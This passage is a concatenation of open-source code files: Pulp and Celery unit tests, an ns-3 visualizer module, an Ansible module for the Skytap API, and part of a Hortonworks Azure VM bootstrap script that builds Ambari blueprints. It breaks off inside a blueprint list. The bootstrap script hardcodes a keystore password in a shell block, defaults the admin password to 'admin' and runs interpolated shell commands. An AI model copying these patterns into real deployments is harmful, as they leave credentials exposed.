@mock.patch('pulp.bindings.repository.RepositoryActionsAPI.publish')
def test_run(self, mock_publish, mock_search, mock_poll):
"""
Test the run() method when there are no incomplete publish tasks in queue.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id, polling.FLAG_BACKGROUND.keyword: False}
# No tasks are running
mock_search.return_value = []
# responses.Response from the sync call
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task = responses.Task(task_data)
mock_publish.return_value = responses.Response(202, task)
self.command.run(**data)
mock_publish.assert_called_once_with(repo_id, self.command.distributor_id, None)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_PUBLISH_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
mock_poll.assert_called_once_with([task], data)
@mock.patch('pulp.client.commands.repo.sync_publish.RunPublishRepositoryCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
@mock.patch('pulp.bindings.repository.RepositoryActionsAPI.publish')
def test_run_already_in_progress(self, mock_publish, mock_search, mock_poll):
"""
Test the run() method when thre is already an incomplete publish operation.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id, polling.FLAG_BACKGROUND.keyword: False}
# Simulate a task already running
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task_data['state'] = 'running'
task = responses.Task(task_data)
mock_search.return_value = [task]
self.command.run(**data)
# Publish shouldn't get called again since it's already running
self.assertEqual(mock_publish.call_count, 0)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_PUBLISH_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
mock_poll.assert_called_once_with([task], data)
write_tags = self.prompt.get_write_tags()
self.assertEqual(2, len(write_tags))
self.assertEqual(write_tags[1], 'in-progress')
@mock.patch('pulp.client.commands.repo.sync_publish.RunPublishRepositoryCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
@mock.patch('pulp.bindings.repository.RepositoryActionsAPI.publish')
def test_run_background(self, mock_publish, mock_search, mock_poll):
"""
Test run() with the --bg flag is set.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id, polling.FLAG_BACKGROUND.keyword: False}
# No tasks are running
mock_search.return_value = []
# responses.Response from the sync call
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task = responses.Task(task_data)
mock_publish.return_value = responses.Response(202, task)
self.command.run(**data)
mock_publish.assert_called_once_with(repo_id, self.command.distributor_id, None)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_PUBLISH_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
mock_poll.assert_called_once_with([task], data)
class PublishStatusCommand(base.PulpClientTests):
def setUp(self):
super(PublishStatusCommand, self).setUp()
self.renderer = mock.MagicMock()
self.command = sp.PublishStatusCommand(self.context, self.renderer)
def test_structure(self):
# Ensure all of the expected options are there
found_options = set(self.command.options)
expected_options = set([options.OPTION_REPO_ID, polling.FLAG_BACKGROUND])
self.assertEqual(found_options, expected_options)
# Ensure the correct method is wired up
self.assertEqual(self.command.method, self.command.run)
# Ensure the correct metadata
self.assertEqual(self.command.name, 'status')
self.assertEqual(self.command.description, sp.DESC_PUBLISH_STATUS)
@mock.patch('pulp.client.commands.repo.sync_publish.PublishStatusCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
def test_run(self, mock_search, mock_poll):
"""
Test the run() method when there is one publish Task. It should call poll() on it.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id}
# Simulate a task already running
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task_data['state'] = 'running'
task = responses.Task(task_data)
mock_search.return_value = [task]
self.command.run(**data)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_PUBLISH_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
mock_poll.assert_called_once_with([task], data)
@mock.patch('pulp.client.commands.repo.sync_publish.PublishStatusCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
def test_run_no_status(self, mock_search, mock_poll):
"""
Test the run() method when there are no current publish Tasks to attach to. It
should query the server and inform the user that there are no publish operations to
report.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id}
# Simulate there being no publish tasks
mock_search.return_value = []
self.command.run(**data)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_PUBLISH_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
self.assertEqual(0, mock_poll.call_count)
self.assertEqual(self.prompt.get_write_tags(), [TAG_TITLE, 'no-tasks'])
| gpl-2.0 |
moijes12/oh-mainline | vendor/packages/celery/celery/tests/test_app/test_app_defaults.py | 19 | 1060 | from __future__ import absolute_import
from __future__ import with_statement
import sys
from importlib import import_module
from celery.tests.utils import unittest, pypy_version, sys_platform
class test_defaults(unittest.TestCase):
def setUp(self):
self._prev = sys.modules.pop("celery.app.defaults", None)
def tearDown(self):
if self._prev:
sys.modules["celery.app.defaults"] = self._prev
def test_default_pool_pypy_14(self):
with sys_platform("darwin"):
with pypy_version((1, 4, 0)):
self.assertEqual(self.defaults.DEFAULT_POOL, "solo")
def test_default_pool_pypy_15(self):
with sys_platform("darwin"):
with pypy_version((1, 5, 0)):
self.assertEqual(self.defaults.DEFAULT_POOL, "processes")
def test_default_pool_jython(self):
with sys_platform("java 1.6.51"):
self.assertEqual(self.defaults.DEFAULT_POOL, "threads")
@property
def defaults(self):
return import_module("celery.app.defaults")
| agpl-3.0 |
nyuwireless/ns3-mmwave | src/visualizer/visualizer/base.py | 160 | 3799 | import ns.point_to_point
import ns.csma
import ns.wifi
import ns.bridge
import ns.internet
import ns.mesh
import ns.wimax
import ns.wimax
import ns.lte
import gobject
import os.path
import sys
PIXELS_PER_METER = 3.0 # pixels-per-meter, at 100% zoom level
class PyVizObject(gobject.GObject):
__gtype_name__ = "PyVizObject"
def tooltip_query(self, tooltip):
tooltip.set_text("TODO: tooltip for %r" % self)
class Link(PyVizObject):
pass
class InformationWindow(object):
def update(self):
raise NotImplementedError
class NetDeviceTraits(object):
def __init__(self, is_wireless=None, is_virtual=False):
assert is_virtual or is_wireless is not None
self.is_wireless = is_wireless
self.is_virtual = is_virtual
netdevice_traits = {
ns.point_to_point.PointToPointNetDevice: NetDeviceTraits(is_wireless=False),
ns.csma.CsmaNetDevice: NetDeviceTraits(is_wireless=False),
ns.wifi.WifiNetDevice: NetDeviceTraits(is_wireless=True),
ns.bridge.BridgeNetDevice: NetDeviceTraits(is_virtual=True),
ns.internet.LoopbackNetDevice: NetDeviceTraits(is_virtual=True, is_wireless=False),
ns.mesh.MeshPointDevice: NetDeviceTraits(is_virtual=True),
ns.wimax.SubscriberStationNetDevice: NetDeviceTraits(is_wireless=True),
ns.wimax.BaseStationNetDevice: NetDeviceTraits(is_wireless=True),
ns.lte.LteUeNetDevice: NetDeviceTraits(is_wireless=True),
ns.lte.LteEnbNetDevice: NetDeviceTraits(is_wireless=True),
}
def lookup_netdevice_traits(class_type):
try:
return netdevice_traits[class_type]
except KeyError:
sys.stderr.write("WARNING: no NetDeviceTraits registered for device type %r; "
"I will assume this is a non-virtual wireless device, "
"but you should edit %r, variable 'netdevice_traits',"
" to make sure.\n" % (class_type.__name__, __file__))
t = NetDeviceTraits(is_virtual=False, is_wireless=True)
netdevice_traits[class_type] = t
return t
def transform_distance_simulation_to_canvas(d):
return d*PIXELS_PER_METER
def transform_point_simulation_to_canvas(x, y):
return x*PIXELS_PER_METER, y*PIXELS_PER_METER
def transform_distance_canvas_to_simulation(d):
return d/PIXELS_PER_METER
def transform_point_canvas_to_simulation(x, y):
return x/PIXELS_PER_METER, y/PIXELS_PER_METER
plugins = []
plugin_modules = {}
def register_plugin(plugin_init_func, plugin_name=None, plugin_module=None):
"""
Register a plugin.
@param plugin: a callable object that will be invoked whenever a
Visualizer object is created, like this: plugin(visualizer)
"""
assert callable(plugin_init_func)
plugins.append(plugin_init_func)
if plugin_module is not None:
plugin_modules[plugin_name] = plugin_module
plugins_loaded = False
def load_plugins():
global plugins_loaded
if plugins_loaded:
return
plugins_loaded = True
plugins_dir = os.path.join(os.path.dirname(__file__), 'plugins')
old_path = list(sys.path)
sys.path.insert(0, plugins_dir)
for filename in os.listdir(plugins_dir):
name, ext = os.path.splitext(filename)
if ext != '.py':
continue
try:
plugin_module = __import__(name)
except ImportError, ex:
print >> sys.stderr, "Could not load plugin %r: %s" % (filename, str(ex))
continue
try:
plugin_func = plugin_module.register
except AttributeError:
print >> sys.stderr, "Plugin %r has no 'register' function" % name
else:
#print >> sys.stderr, "Plugin %r registered" % name
register_plugin(plugin_func, name, plugin_module)
sys.path = old_path
| gpl-2.0 |
benc-uk/skytap-ansible | library/skytap_environment.py | 1 | 5233 | #!/usr/bin/python
# Copyright (c) 2016 Ben Coleman
# Software provided under the terms of the Apache 2.0 license http://www.apache.org/licenses/LICENSE-2.0.txt
DOCUMENTATION = '''
---
module: skytap_environment
short_description: Build and control Skytap cloud environments
'''
import json
import requests
import sys
import time
from ansible.module_utils.basic import AnsibleModule
# API endpoint for Skytap REST API
API_BASE = 'https://cloud.skytap.com/'
API_HEADERS = {'accept': 'application/json', 'content-type': 'application/json'}
# Basic REST call to Skytap API
def restCall(auth, method, path, data=None):
try:
if(method == 'GET'):
result = requests.get(API_BASE + path, headers=API_HEADERS, auth=auth)
if(method == 'POST'):
result = requests.post(API_BASE + path, headers=API_HEADERS, auth=auth, data=data)
if(method == 'PUT'):
result = requests.put(API_BASE + path, headers=API_HEADERS, auth=auth, data=data)
if(method == 'DELETE'):
result = requests.delete(API_BASE + path, headers=API_HEADERS, auth=auth, allow_redirects=True)
if len(result.content) > 0:
return result.status_code, result.json()
else:
return result.status_code, None
except:
return -1, None
# Main module code here
def main():
module = AnsibleModule(
argument_spec = dict(
username = dict(required=True),
token = dict(required=True),
action = dict(default='create', choices=['create', 'modify', 'delete', 'read', 'list', 'wait_ratelimit', 'copy']),
template_id = dict(required=False),
environment_id = dict(required=False),
name = dict(required=False),
state = dict(required=False, choices=['running', 'stopped', 'suspended', 'halted', 'reset'])
),
supports_check_mode=False
)
auth = (module.params.get('username'), module.params.get('token'))
if module.params.get('action') == 'create':
if not module.params.get('template_id'):
module.fail_json(msg="template_id is required param when action=create")
request_data = {"template_id": module.params.get('template_id')}
if module.params.get('name'):
request_data['name'] = module.params.get('name')
status, result = restCall(auth, 'POST', '/v1/configurations', data=json.dumps(request_data))
if module.params.get('action') == 'modify':
request_data = {}
if not module.params.get('environment_id'):
module.fail_json(msg="environment_id is required param when action=modify")
if module.params.get('state'):
request_data['runstate'] = module.params.get('state')
if module.params.get('name'):
request_data['name'] = module.params.get('name')
status, result = restCall(auth, 'PUT', '/v1/configurations/'+str(module.params.get('environment_id')), data=json.dumps(request_data))
if module.params.get('action') == 'delete':
if not module.params.get('environment_id'):
module.fail_json(msg="environment_id is required param when action=delete")
status, result = restCall(auth, 'DELETE', '/v1/configurations/'+str(module.params.get('environment_id')))
if module.params.get('action') == 'read':
if not module.params.get('environment_id'):
module.fail_json(msg="environment_id is required param when action=read")
status, result = restCall(auth, 'GET', '/v1/configurations/'+str(module.params.get('environment_id')))
if module.params.get('action') == 'list':
status, result = restCall(auth, 'GET', '/v2/configurations?scope=me&count=100')
if module.params.get('action') == 'copy':
if not module.params.get('environment_id'):
module.fail_json(msg="environment_id is required param when action=copy")
request_data = {"configuration_id": module.params.get('environment_id')}
if module.params.get('name'):
request_data['name'] = module.params.get('name')
status, result = restCall(auth, 'POST', '/v1/configurations', data=json.dumps(request_data))
if module.params.get('action') == 'wait_ratelimit':
if not module.params.get('environment_id'):
module.fail_json(msg="environment_id is required param when action=wait_ratelimit")
tries = 0
status = -1
while True:
status, result = restCall(auth, 'GET', '/v1/configurations/'+str(module.params.get('environment_id')))
tries = tries + 1
if (status != 423 or status != 422) or tries > 30:
time.sleep(5)
break
time.sleep(5)
# Check results and exit
if status != requests.codes.ok:
err = "No error message given, likely connection or network failure"
if result != None and result.has_key('error'): err = result['error']
module.fail_json(msg="API call failed, HTTP status: "+str(status)+", error: "+err)
else:
module.exit_json(changed=True, api_result=result, status_code=status)
module.exit_json(changed=False)
if __name__ == '__main__':
main()
| apache-2.0 |
hongbincao/azure-quickstart-templates | hortonworks-on-centos/scripts/vm-bootstrap.py | 89 | 53170 | #
# vm-bootstrap.py
#
# This script is used to prepare VMs launched via HDP Cluster Install Blade on Azure.
#
# Parameters passed from the bootstrap script invocation by the controller (shown in the parameter order).
# Required parameters:
# action: "bootstrap" to set up VM and initiate cluster deployment. "check" for checking on cluster deployment status.
# cluster_id: user-specified name of the cluster
# admin_password: password for the Ambari "admin" user
# Required parameters for "bootstrap" action:
# scenario_id: "evaluation" or "standard"
# num_masters: number of masters in the cluster
# num_workers: number of workers in the cluster
# master_prefix: hostname prefix for master hosts (master hosts are named <cluster_id>-<master_prefix>-<id>
# worker_prefix: hostname prefix for worker hosts (worker hosts are named <cluster_id>-<worker_prefix>-<id>
# domain_name: the domain name part of the hosts, starting with a period (e.g., .cloudapp.net)
# id_padding: number of digits for the host <id> (e.g., 2 uses <id> like 01, 02, .., 10, 11)
# masters_iplist: list of masters' local IPV4 addresses sorted from master_01 to master_XX delimited by a ','
# workers_iplist: list of workers' local IPV4 addresses sorted from worker_01 to worker_XX delimited by a ','
# Required parameters for "check" action:
# --check_timeout_seconds:
# the number of seconds after which the script is required to exit
# --report_timeout_fail:
# if "true", exit code 1 is returned in case deployment has failed, or deployment has not finished after
# check_timeout_seconds
# if "false", exit code 0 is returned if deployment has finished successfully, or deployment has not finished after
# check_timeout_seconds
# Optional:
# protocol: if "https" (default), https:8443 is used for Ambari. Otherwise, Ambari uses http:8080
from optparse import OptionParser
import base64
import json
import logging
import os
import pprint
import re
import socket
import sys
import time
import urllib2
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
handler = logging.FileHandler('/tmp/vm-bootstrap.log')
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.info('Starting VM Bootstrap...')
parser = OptionParser()
parser.add_option("--cluster_id", type="string", dest="cluster_id")
parser.add_option("--scenario_id", type="string", dest="scenario_id", default="evaluation")
parser.add_option("--num_masters", type="int", dest="num_masters")
parser.add_option("--num_workers", type="int", dest="num_workers")
parser.add_option("--master_prefix", type="string", dest="master_prefix")
parser.add_option("--worker_prefix", type="string", dest="worker_prefix")
parser.add_option("--domain_name", type="string", dest="domain_name")
parser.add_option("--id_padding", type="int", dest="id_padding", default=2)
parser.add_option("--admin_password", type="string", dest="admin_password", default="admin")
parser.add_option("--masters_iplist", type="string", dest="masters_iplist")
parser.add_option("--workers_iplist", type="string", dest="workers_iplist")
parser.add_option("--protocol", type="string", dest="protocol", default="https")
parser.add_option("--action", type="string", dest="action", default="bootstrap")
parser.add_option("--check_timeout_seconds", type="int", dest="check_timeout_seconds", default="250")
parser.add_option("--report_timeout_fail", type="string", dest="report_timeout_fail", default="false")
(options, args) = parser.parse_args()
cluster_id = options.cluster_id
scenario_id = options.scenario_id.lower()
num_masters = options.num_masters
num_workers = options.num_workers
master_prefix = options.master_prefix
worker_prefix = options.worker_prefix
domain_name = options.domain_name
id_padding = options.id_padding
admin_password = options.admin_password
masters_iplist = options.masters_iplist
workers_iplist = options.workers_iplist
protocol = options.protocol
action = options.action
check_timeout_seconds = options.check_timeout_seconds
report_timeout_fail = options.report_timeout_fail.lower() == "true"
logger.info('action=' + action)
admin_username = 'admin'
current_admin_password = 'admin'
request_timeout = 30
port = '8443' if (protocol == 'https') else '8080'
http_handler = urllib2.HTTPHandler(debuglevel=1)
opener = urllib2.build_opener(http_handler)
urllib2.install_opener(opener)
class TimeoutException(Exception):
pass
def get_ambari_auth_string():
return 'Basic ' + base64.encodestring('%s:%s' % (admin_username, current_admin_password)).replace('\n', '')
def run_system_command(command):
os.system(command)
def get_hostname(id):
if id <= num_masters:
return master_prefix + str(id).zfill(id_padding)
else:
return worker_prefix + str(id - num_masters).zfill(id_padding)
def get_fqdn(id):
return get_hostname(id) + domain_name
def get_host_ip(hostname):
if (hostname.startswith(master_prefix)):
return masters_iplist[int(hostname.split('-')[-1]) -1]
else:
return workers_iplist[int(hostname.split('-')[-1]) -1]
def get_host_ip_map(hostnames):
host_ip_map = {}
for hostname in hostnames:
num_tries = 0
ip = None
while ip is None and num_tries < 5:
try:
ip = get_host_ip(hostname)
# ip = socket.gethostbyname(hostname)
except:
time.sleep(1)
num_tries = num_tries + 1
continue
if ip is None:
logger.info('Failed to look up ip address for ' + hostname)
raise
else:
logger.info(hostname + ' resolved to ' + ip)
host_ip_map[hostname] = ip
return host_ip_map
def update_etc_hosts(host_ip_map):
logger.info('Adding entries to /etc/hosts file...')
with open("/etc/hosts", "a") as file:
for host in sorted(host_ip_map):
file.write('%s\t%s\t%s\n' % (host_ip_map[host], host + domain_name, host))
logger.info('Finished updating /etc/hosts')
def update_ambari_agent_ini(ambari_server_hostname):
logger.info('Updating ambari-agent.ini file...')
command = 'sed -i s/hostname=localhost/hostname=%s/ /etc/ambari-agent/conf/ambari-agent.ini' % ambari_server_hostname
logger.info('Executing command: ' + command)
run_system_command(command)
logger.info('Finished updating ambari-agent.ini file')
def patch_ambari_agent():
logger.info('Patching ambari-agent to prevent rpmdb corruption...')
logger.info('Finished patching ambari-server')
def enable_https():
command = """
printf 'api.ssl=true\nclient.api.ssl.cert_name=https.crt\nclient.api.ssl.key_name=https.key\nclient.api.ssl.port=8443' >> /etc/ambari-server/conf/ambari.properties
mkdir /root/ambari-cert
cd /root/ambari-cert
# create server.crt and server.key (self-signed)
openssl genrsa -out server.key 2048
openssl req -new -key server.key -out server.csr -batch
openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt
echo PulUuMWPp0o4Lq6flGA0NGDKNRZQGffW2mWmJI3klSyspS7mUl > pass.txt
cp pass.txt passin.txt
# encrypts server.key with des3 as server.key.secured with the specified password
openssl rsa -in server.key -des3 -out server.key.secured -passout file:pass.txt
# creates /tmp/https.keystore.p12
openssl pkcs12 -export -in 'server.crt' -inkey 'server.key.secured' -certfile 'server.crt' -out '/var/lib/ambari-server/keys/https.keystore.p12' -password file:pass.txt -passin file:passin.txt
mv pass.txt /var/lib/ambari-server/keys/https.pass.txt
cd ..
rm -rf /root/ambari-cert
"""
run_system_command(command)
def set_admin_password(new_password, timeout):
logger.info('Setting admin password...')
def poll_until_all_agents_registered(num_hosts, timeout):
url = '%s://localhost:%s/api/v1/hosts' % (protocol, port)
logger.info('poll until all agents')
all_hosts_registered = False
start_time = time.time()
while time.time() - start_time < timeout:
request = urllib2.Request(url)
request.add_header("Authorization", get_ambari_auth_string())
try:
result = urllib2.urlopen(request, timeout=request_timeout).read()
pprint.pprint(result)
if (result is not None):
jsonResult = json.loads(result)
if len(jsonResult['items']) >= num_hosts:
all_hosts_registered = True
break
except :
logger.exception('Could not poll agent status from the server.')
time.sleep(5)
if not all_hosts_registered:
raise Exception('Timed out while waiting for all agents to register')
def is_ambari_server_host():
hostname = socket.getfqdn()
hostname = hostname.split('.')[0]
logger.info(hostname)
logger.info('Checking ambari host')
logger.info(ambari_server_hostname)
return hostname == ambari_server_hostname
def create_blueprint(scenario_id):
blueprint_name = 'myblueprint'
logger.info('Creating blueprint for scenario %s' % scenario_id)
url = '%s://localhost:%s/api/v1/blueprints/%s' % (protocol, port, blueprint_name)
evaluation_host_groups = [
{
"name" : "master_1",
"components" : [
{
"name" : "AMBARI_SERVER"
},
{
"name" : "DRPC_SERVER"
},
{
"name" : "HIVE_SERVER"
},
{
"name" : "MYSQL_SERVER"
},
{
"name" : "NIMBUS"
},
{
"name" : "SECONDARY_NAMENODE"
},
{
"name" : "SPARK_JOBHISTORYSERVER"
},
{
"name" : "STORM_UI_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_2",
"components" : [
{
"name" : "APP_TIMELINE_SERVER"
},
{
"name" : "FALCON_SERVER"
},
{
"name" : "HBASE_MASTER"
},
{
"name" : "HISTORYSERVER"
},
{
"name" : "HIVE_METASTORE"
},
{
"name" : "KAFKA_BROKER"
},
{
"name" : "METRICS_COLLECTOR"
},
{
"name" : "NAMENODE"
},
{
"name" : "OOZIE_SERVER"
},
{
"name" : "RESOURCEMANAGER"
},
{
"name" : "WEBHCAT_SERVER"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "workers",
"components" : [
{
"name" : "DATANODE"
},
{
"name" : "HBASE_REGIONSERVER"
},
{
"name" : "NODEMANAGER"
},
{
"name" : "SUPERVISOR"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "3"
}
]
small_host_groups = [
{
"name" : "master_1",
"components" : [
{
"name" : "AMBARI_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_2",
"components" : [
{
"name" : "METRICS_COLLECTOR"
},
{
"name" : "NAMENODE"
},
{
"name" : "NIMBUS"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_3",
"components" : [
{
"name" : "DRPC_SERVER"
},
{
"name" : "FALCON_SERVER"
},
{
"name" : "HBASE_MASTER"
},
{
"name" : "HISTORYSERVER"
},
{
"name" : "HIVE_METASTORE"
},
{
"name" : "KAFKA_BROKER"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_SERVER"
},
{
"name" : "RESOURCEMANAGER"
},
{
"name" : "SECONDARY_NAMENODE"
},
{
"name" : "WEBHCAT_SERVER"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_4",
"components" : [
{
"name" : "APP_TIMELINE_SERVER"
},
{
"name" : "HIVE_SERVER"
},
{
"name" : "MYSQL_SERVER"
},
{
"name" : "SPARK_JOBHISTORYSERVER"
},
{
"name" : "STORM_UI_SERVER"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "workers",
"components" : [
{
"name" : "DATANODE"
},
{
"name" : "HBASE_REGIONSERVER"
},
{
"name" : "NODEMANAGER"
},
{
"name" : "SUPERVISOR"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "9"
}
]
medium_host_groups = [
{
"name" : "master_1",
"components" : [
{
"name" : "AMBARI_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_2",
"components" : [
{
"name" : "DRPC_SERVER"
},
{
"name" : "METRICS_COLLECTOR"
},
{
"name" : "NAMENODE"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_3",
"components" : [
{
"name" : "HIVE_SERVER"
},
{
"name" : "SUPERVISOR"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
